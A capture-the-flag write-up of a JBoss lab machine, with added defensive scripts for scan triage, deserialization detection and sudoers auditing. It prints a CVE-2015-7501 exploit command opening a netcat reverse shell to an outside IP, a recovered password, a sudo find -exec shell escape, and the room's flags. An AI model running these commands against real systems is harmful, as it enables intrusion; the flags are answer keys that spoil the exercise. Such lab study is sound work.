Port scanning

nmap --min-rate 10000 -p- 10.10.230.227
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-11 14:40 UTC
Nmap scan report for ip-10-10-230-227.eu-west-1.compute.internal (10.10.230.227)
Host is up (0.0056s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1090/tcp open ff-fms
1091/tcp open ff-sm
1098/tcp open rmiactivation
1099/tcp open rmiregistry
3873/tcp open fagordnc
4446/tcp open n1-fwp
4712/tcp open unknown
4713/tcp open pulseaudio
5445/tcp open smbdirect
5455/tcp open apc-5455
5500/tcp open hotline
5501/tcp open fcp-addr-srvr2
8009/tcp open ajp13
8080/tcp open http-proxy
8083/tcp open us-srv
MAC Address: 02:95:44:AE:CC:DF (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.68 seconds
nmap -sT -sV -sC -O -p22,80,8009,8080 10.10.230.227
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-11 14:48 UTC
Nmap scan report for ip-10-10-230-227.eu-west-1.compute.internal (10.10.230.227)
Host is up (0.00054s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6978cb974d0f39efef3a5eaf8a9b57a (DSA)
| 2048 33a47b9138585030892de457bb07bb2f (RSA)
| 256 21018b37f51e2bc557f1b042b732abea (ECDSA)
|_ 256 f636073c3b3d7130c4cd2a1300b525ae (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Tony's Blog
|_http-generator: Hugo 0.66.0
|_http-server-header: Apache/2.4.7 (Ubuntu)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-title: Welcome to JBoss AS
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
MAC Address: 02:95:44:AE:CC:DF (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (99%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.8 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.38 seconds
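An added example (not part of the original writeup or the room's tooling): a small triage script that parses nmap's normal output, such as the scan above, and pulls out open ports, service banners and the "Potentially risky methods" lines, so that findings like the JBoss/AJP services are summarised for follow-up. The embedded nmap text is a trimmed copy of the output above, and the banner watch-list is an assumption for this example, not an nmap feature.

```python
import re

# Constructed sample: a trimmed copy of the nmap -sV -sC output shown above.
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Tony's Blog
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
| Potentially risky methods: PUT DELETE TRACE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
|_http-title: Welcome to JBoss AS
"""

# One "port/proto state service version" line as nmap prints it.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# The NSE line emitted by http-methods / ajp-methods.
RISKY_RE = re.compile(r"Potentially risky methods:\s*(.+)$")

# Service names and banner fragments worth a second look (assumed watch-list).
WATCH_BANNERS = ("jboss", "jserv", "rmiregistry", "rmiactivation", "ajp")


def parse_nmap(text):
    """Return {port: {proto, state, service, version, risky_methods, script_lines}}."""
    ports = {}
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))
            current = ports[port] = {
                "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(),
                "risky_methods": [], "script_lines": [],
            }
            continue
        # NSE script output is indented with "|" / "|_" under the port line.
        if current is None or not line.startswith("|"):
            continue
        body = line.lstrip("|_ ").strip()
        current["script_lines"].append(body)
        r = RISKY_RE.search(body)
        if r:
            current["risky_methods"] = r.group(1).split()
    return ports


def triage(ports):
    """Produce (port, reason) findings a defender would want to follow up."""
    findings = []
    for port, info in sorted(ports.items()):
        if info["state"] != "open":
            continue
        if info["risky_methods"]:
            findings.append((port, "risky HTTP methods: " + " ".join(info["risky_methods"])))
        haystack = " ".join([info["service"], info["version"], *info["script_lines"]]).lower()
        for needle in WATCH_BANNERS:
            if needle in haystack:
                findings.append((port, f"watch-list service/banner: {needle}"))
                break
    return findings


if __name__ == "__main__":
    for port, reason in triage(parse_nmap(SAMPLE_NMAP)):
        print(f"{port}/tcp  {reason}")
```

PUT and DELETE being advertised on a Tomcat/JBoss front end is itself a configuration finding, independent of the deserialization bug: the fix is to restrict those methods in web.xml or at the reverse proxy.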

Exploit

Visit port 80

Directory scanning turns up http://10.10.230.227/posts/frosted-flakes/, which contains an image; downloading it and running strings on it reveals the string

THM{Tony_Sure_Loves_Frosted_Flakes}

Visit JBoss on port 8080 at http://10.10.230.227:8080/jbossmq-httpil/HTTPServerILServlet

The error response shows it is a 6.x release, and according to the room hint the vulnerability is CVE-2015-7501.

Use the tools the room provides: ysoserial.jar to build the deserialization gadget chain, plus a Python exploit script that makes it convenient to run commands directly.

python2 exploit.py 10.10.230.227:8080 'nc -e /bin/bash 10.11.77.28 1234'

Note that it needs a JRE to run.
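An added defender-side example (not part of the writeup or the room's tooling): a check that flags HTTP requests whose body starts with the Java serialization stream header (STREAM_MAGIC 0xACED followed by STREAM_VERSION 0x0005, or its base64 form "rO0AB") and that are aimed at the JBoss invoker servlets abused in CVE-2015-7501. The request samples are constructed, and the endpoint list is an assumption to start from rather than a complete census.

```python
# Java serialization stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005.
JAVA_SER_MAGIC = b"\xac\xed\x00\x05"
# The same four bytes at the start of a base64-encoded body.
JAVA_SER_MAGIC_B64 = b"rO0AB"

# Endpoints in JBoss AS 4-6 that deserialize request bodies (assumed starting list).
INVOKER_PATHS = (
    "/invoker/JMXInvokerServlet",
    "/invoker/EJBInvokerServlet",
    "/invoker/readonly",
)


def looks_like_java_serialized(body: bytes) -> bool:
    """True if the body is a raw or base64-wrapped Java serialization stream."""
    return body.startswith(JAVA_SER_MAGIC) or body.startswith(JAVA_SER_MAGIC_B64)


def inspect_request(method: str, path: str, body: bytes) -> list:
    """Return the reasons a request is suspicious; an empty list means nothing seen."""
    reasons = []
    is_ser = looks_like_java_serialized(body)
    on_invoker = any(path.startswith(p) for p in INVOKER_PATHS)
    if is_ser:
        reasons.append("body is a Java serialization stream")
    if on_invoker and method.upper() == "POST":
        reasons.append(f"POST to JBoss invoker endpoint {path}")
    if is_ser and on_invoker:
        reasons.append("possible CVE-2015-7501 style deserialization attempt")
    return reasons


# Constructed samples: (method, path, body). Bodies are dummy bytes, not real payloads.
SAMPLES = [
    ("GET", "/jbossmq-httpil/HTTPServerILServlet", b""),
    ("POST", "/invoker/JMXInvokerServlet", JAVA_SER_MAGIC + b"\x73\x72" + b"x" * 32),
    ("POST", "/app/api", b"rO0ABXNy" + b"constructed-not-a-payload"),
    ("POST", "/app/api", b'{"user":"tony"}'),
]


def scan_samples(samples=SAMPLES) -> list:
    """Inspect each sample in order and return the list of reason lists."""
    return [inspect_request(m, p, b) for m, p, b in samples]


if __name__ == "__main__":
    for (method, path, _), reasons in zip(SAMPLES, scan_samples()):
        print(f"{method} {path}: {reasons or 'clean'}")
```

A wire-level check like this is a compensating control only; the real fix for CVE-2015-7501 is to patch or remove the invoker servlets and restrict who can reach them, with a JVM deserialization filter (JEP 290 style) as defence in depth.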

That gives a reverse shell.

cd /home/jboss
cat .jboss.txt
THM{50c10ad46b5793704601ecdad865eb06}

Privilege escalation

The jboss password is found in the note.

su jboss
Password: likeaboss
sudo find . -exec /bin/sh \; -quit
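An added hardening example (not the writeup's own code): a small audit that parses sudoers-style rules and flags unrestricted entries and entries granting binaries whose own options can run arbitrary commands or spawn a shell, the way find's -exec does above. The sudoers lines and the watch-list of binaries are constructed for this example; the list is deliberately short.

```python
import re

# Binaries whose legitimate options can run commands or open a shell (assumed short list).
SHELL_CAPABLE = {"find", "vim", "vi", "less", "more", "awk", "python", "python3", "perl", "bash", "sh"}

# user  host=(runas) [NOPASSWD:|PASSWD:] cmd, cmd ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
NON_RULE_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_rule(line: str):
    """Parse one sudoers user specification; return None for comments, Defaults, aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(NON_RULE_PREFIXES):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    cmds = m.group("cmds")
    nopasswd = "NOPASSWD:" in cmds
    cmds = cmds.replace("NOPASSWD:", "").replace("PASSWD:", "")
    commands = [c.strip() for c in cmds.split(",") if c.strip()]
    return {
        "user": m.group("user"), "host": m.group("host"),
        "runas": m.group("runas") or "root", "nopasswd": nopasswd,
        "commands": commands,
    }


def audit(sudoers_text: str) -> list:
    """Return (user, command, reason) findings for risky rules."""
    findings = []
    for line in sudoers_text.splitlines():
        rule = parse_rule(line)
        if not rule:
            continue
        for cmd in rule["commands"]:
            if cmd == "ALL":
                findings.append((rule["user"], cmd, "unrestricted sudo"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_CAPABLE:
                how = "without a password" if rule["nopasswd"] else "with own password"
                findings.append((rule["user"], cmd, f"shell-capable binary as {rule['runas']} {how}"))
    return findings


# Constructed sudoers snippet: one entry like the jboss case above, one harmless one.
SAMPLE_SUDOERS = """\
# constructed sample
Defaults env_reset
root    ALL=(ALL:ALL) ALL
jboss   ALL=(ALL) NOPASSWD: /usr/bin/find
backup  ALL=(root) /sbin/reboot
"""

if __name__ == "__main__":
    for user, cmd, reason in audit(SAMPLE_SUDOERS):
        print(f"{user}: {cmd}  ->  {reason}")
```

Whether a rule requires a password or not makes little difference once the account's own password has been recovered from a note, as it was here; the durable fix is not to delegate shell-capable binaries through sudo at all, but to wrap the one needed action in a fixed script and grant only that.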

This yields root.txt:

QkM3N0FDMDcyRUUzMEUzNzYwODA2ODY0RTIzNEM3Q0Y==

After base64 decoding:

BC77AC072EE30E3760806864E234C7CF

An online MD5 lookup gives: zxcvbnm123456789

Ramblings

I haven't done any boxes lately because I've been studying Java security, and I have to say Java is really hard. Back on THM, I picked an easy Java box.